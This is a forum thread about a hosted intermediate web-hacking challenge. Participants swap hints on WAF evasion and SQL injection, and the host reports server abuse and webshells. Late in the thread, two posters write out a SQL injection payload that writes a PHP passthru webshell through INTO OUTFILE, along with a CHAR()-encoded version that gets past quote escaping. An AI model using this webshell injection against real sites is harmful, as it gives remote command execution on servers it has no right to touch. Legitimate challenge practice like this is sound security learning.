Security Challenge II (Web Hacking Intermediate)

dlofnep

Rules.

No need for brute forcing or exploits. No DoS attacks, or attacks on the network. Will be monitoring logs - anyone going outside the challenge will be blacklisted.

Challenge: http://republicofhack.dyndns.org/

Best of luck. I'd estimate the challenge to be of medium difficulty, more difficult than my previous challenge - but not as difficult as Damo's last challenge.

h57xiucj2z946q

Sweet, will take a look at it after work.

dlofnep

Cool

Also can I add, there is no need for any automated scanners. This challenge is doable manually, and requires nothing beyond a few browser addons.

syklops

Is it still up? Im getting connection timed out.....

dlofnep

Server is backup, sorry about that.

dlofnep

1 completed so far

syklops

Stuck on the login screen

dlofnep

syklops wrote: »

Stuck on the login screen

You'll need to figure out how it's validated and what exactly is validating it

.

h57xiucj2z946q

done and done, nice challenge! :-)

dlofnep

Congrats Damo Glad you liked it.

h57xiucj2z946q

Anyone else trying this?

Redshift

Is it possible to get SQLi through the WAF? I've tried various ways of encoding it it's detected when plain but when encoded I cant determine if anything is being executed becuase I cant see any feedback

syklops

Redshift wrote: »

Is it possible to get SQLi through the WAF? I've tried various ways of encoding it it's detected when plain but when encoded I cant determine if anything is being executed becuase I cant see any feedback

RedShift:

I believe that SQLi is not necessary. Its something else...

h57xiucj2z946q

Redshift wrote: »

Is it possible to get SQLi through the WAF? I've tried various ways of encoding it it's detected when plain but when encoded I cant determine if anything is being executed becuase I cant see any feedback

If you stuck on the WAF itself, try the most basic query and narrow it down until you find how its detected. You won't have to do complicated encodings.

dlofnep

Redshift:

You're doing well, it's not a tough WAF - I promise. Google WAF evasion and see if you can find anything.

Redshift

Am I right in saying that I can't use union at all as it's filtered and instead of going after password hashes I should try for a file using another keyword which is not filtered.

Sorry if i'm not making sense.

Will have another look tomorrow, have to get up for work

chuckleberryfin

Thanks for this, spent a bit too much time on

checking the tables

but was fun.

dlofnep

Redshift wrote: »

Am I right in saying that I can't use union at all as it's filtered and instead of going after password hashes I should try for a file using another keyword which is not filtered.

Sorry if i'm not making sense.

Will have another look tomorrow, have to get up for work

You can use it but you need to evade the filter After that, there's another part - you'll see when you get there

dlofnep

chuckleberryfin wrote: »

Thanks for this, spent a bit too much time on

checking the tables

but was fun.

congrats!

dlofnep

Server will be down for a few hours.

dlofnep

Back up again

syklops

Its no good now, is it? Where was it at 8am this morning when I had time to throw sh1t at it? :mad:

Seriously though its a great challenge. If I could only figure out where the Womens auxiliary air force came into it.

900913

Great challenge. I found one part really difficult.

dlofnep

900913 wrote: »

Great challenge. I found one part really difficult.

Msg me which part

And congrats!

Pygmalion

chuckleberryfin wrote: »

Thanks for this, spent a bit too much time on

checking the tables

but was fun.

Same, I spent pretty much all last night trying to

Find usernames/passwords in the SQL database

, had a look at the

WAF evasion

today and got it within a few minutes :P.

Also, apologies if my method of getting table and column names counted as brute-forcing or was a bit excessive, that was before I had a look at the WAF evasion and that was the only way I could think of to get them :P

Also since 900913 is down as "900913 cheated" in the HoF, is there an interesting story behind this or something?
Would be interesting to see how he did it if so :P

dlofnep

I sent him a message asking about that, I'm awaiting a response

900913

I used an application(acunetix http editor) instead of a firefox plugin to postdata

dlofnep

There is some server abuse, if it continues I will take it offline. This is the only warning. I hosted this challenge for people to have fun, and not to abuse it.

dlofnep

Server offline on account of misbehaviour. Will be examining the logs and certain people will be blacklisted from future events.

Successfully completed challenge:

sk
Damo2k
netjester
chuckleberryfinn
900913
Pygmalion

Redshift

Arrgh, just had that excited feeling of I think I know how to do this and just as I hit submit Bam Server gone.
Damn you whoever was fooling about:mad:

jim_bob

me too, although i doubt i was as close:o

any chance of bring it back

Redshift

Any chance of the code? id love to install this on my VM and actually complete it?
Might I suggest in future that you have to PM for the link to the challenge, might put some of the morons off bothering and give those of us who actually want to learn how to hack manually a chance.
Many thanks for hosting this and putting it together and I hope you are not put off doing more

dlofnep

Redshift - I'll put it back up tomorrow, just need to secure some things. Sorry about that.

Redshift

dlofnep wrote: »

Redshift - I'll put it back up tomorrow, just need to secure some things. Sorry about that.

You're a gent, thanks

chuckleberryfin

That's annoying, you could try some restricted access based on IPs, if the server wasn't compromised.

900913

chuckleberryfin wrote: »

That's annoying, you could try some restricted access based on IPs, if the server wasn't compromised.

How would that work?

dlofnep

900913 wrote: »

How would that work?

A whitelist with iptables, but it's too much bother.

900913

dlofnep wrote: »

A whitelist with iptables, but it's too much bother.

I thought mysql 5.* was locked down to local access only.

user:password:host mysql.user
root:167E7CDA67FDA14F9CCDA1B3AEFDDF49AA7xxxx:localhost

If it was

root: hash: %

Then I could possibly get access to mysql.

But by default the myql db is locked to local connections.

I'm I missing something?

dlofnep

I was referring to the server as a whole.

dlofnep

Sorry guys, I'll put the server backup tomorrow for anyone who wants to have another crack at it.

dlofnep

Sorry for the delay. Challenge back up: http://republicofhack.dyndns.org/

dlofnep

Anyone who may have attempted it yesterday, apologies - I didn't allocate the DB user sufficient privs to complete the challenge. Should be ok now

dlofnep

Who dropped the web-shell btw? They get bonus points.

dlofnep

Alright lads - too many people toying with webshells. I've taken the challenge down.

Completed

sk
Damo2k
netjester
chuckleberryfinn
900913
Pygmalion
Sigtran
rockethamster
Redshift

900913

How could anyone get a webshell uploaded,
Mysql was locked to localhost,
phpmyadmin is blocked
and magic_quotes_gpc = On

There the only ways I know to upload a shell using mysql.

The only other way I can think of is an lfi.

?id=null union select '<?php passthru($_GET[cmd]);?> OR R57 type Shell' into outfile '/tmp/shell'

and then include it with the lfi.

But that wont work with magic_quotes_gpc = on

Pygmalion

900913 wrote: »

How could anyone get a webshell uploaded,
Mysql was locked to localhost,
phpmyadmin is blocked
and magic_quotes_gpc = On

There the only ways I know to upload a shell using mysql.

The only other way I can think of is an lfi.

?id=null union select '<?php passthru($_GET[cmd]);?> OR R57 type Shell' into outfile '/tmp/shell'

and then include it with the lfi.

But that wont work with magic_quotes_gpc = on

But magic_quotes wasn't on

Also, when magic quotes is on you can use the CHAR method to get strings into the query, so in this case SELECT '<?php passthru($_GET[cmd]);?> OR R57 type Shell' becomes SELECT CHAR(60, 63, 112, 104, 112, 32, 112, 97, 115, 115, 116, 104, 114, 117, 40, 36, 95, 71, 69, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62, 32, 79, 82, 32, 82, 53, 55, 32, 116, 121, 112, 101, 32, 83, 104, 101, 108, 108) :P

Handy for when people think magic_quotes or mysql_real_escape_string is some kind of magic catch-all, but use integer IDs that aren't ever actually treated as strings so have no quotes to escape :P.

dlofnep

900913 wrote: »

How could anyone get a webshell uploaded,
Mysql was locked to localhost,
phpmyadmin is blocked
and magic_quotes_gpc = On

There the only ways I know to upload a shell using mysql.

The only other way I can think of is an lfi.

?id=null union select '<?php passthru($_GET[cmd]);?> OR R57 type Shell' into outfile '/tmp/shell'

and then include it with the lfi.

But that wont work with magic_quotes_gpc = on

It was uploaded to the webroot, which wasn't world-writeable. I will have a glance over the access logs later. It was from someone based in Ireland in anycase, I saved their IP address. I'm curious myself. In anycase, if the person involved wants to shoot me a friendly PM - i'd be happy to chat.

900913

Pygmalion wrote: »

But magic_quotes wasn't on

Also, when magic quotes is on you can use the CHAR method to get strings into the query, so in this case SELECT '<?php passthru($_GET[cmd]);?> OR R57 type Shell' becomes SELECT CHAR(60, 63, 112, 104, 112, 32, 112, 97, 115, 115, 116, 104, 114, 117, 40, 36, 95, 71, 69, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62, 32, 79, 82, 32, 82, 53, 55, 32, 116, 121, 112, 101, 32, 83, 104, 101, 108, 108) :P

Handy for when people think magic_quotes or mysql_real_escape_string is some kind of magic catch-all, but use integer IDs that aren't ever actually treated as strings so have no quotes to escape :P.

You still need quotes for "into outfile" or dumpfile. Otherwise you cant write your shell.
'/tmp/shell'

dlofnep

Sorry for bumping an old thread - but just found out that Pygmalion was Paul Bunbury. Unfortunately, his body was found today. Very tragic, and my memory of his posts in the security forum is that he was a very capable hacker with a bright future.

Very very sad.

Redshift

It's tragic to see the life of a talented young person cut short like this. I didn't know Paul other than from his posts in here. But RIP Pygmalion and my deepest condolences to his family and friends:(

900913

Very very sad, he was only 19 years old.
My thoughts are with his family and friends.
RIP Pygmalion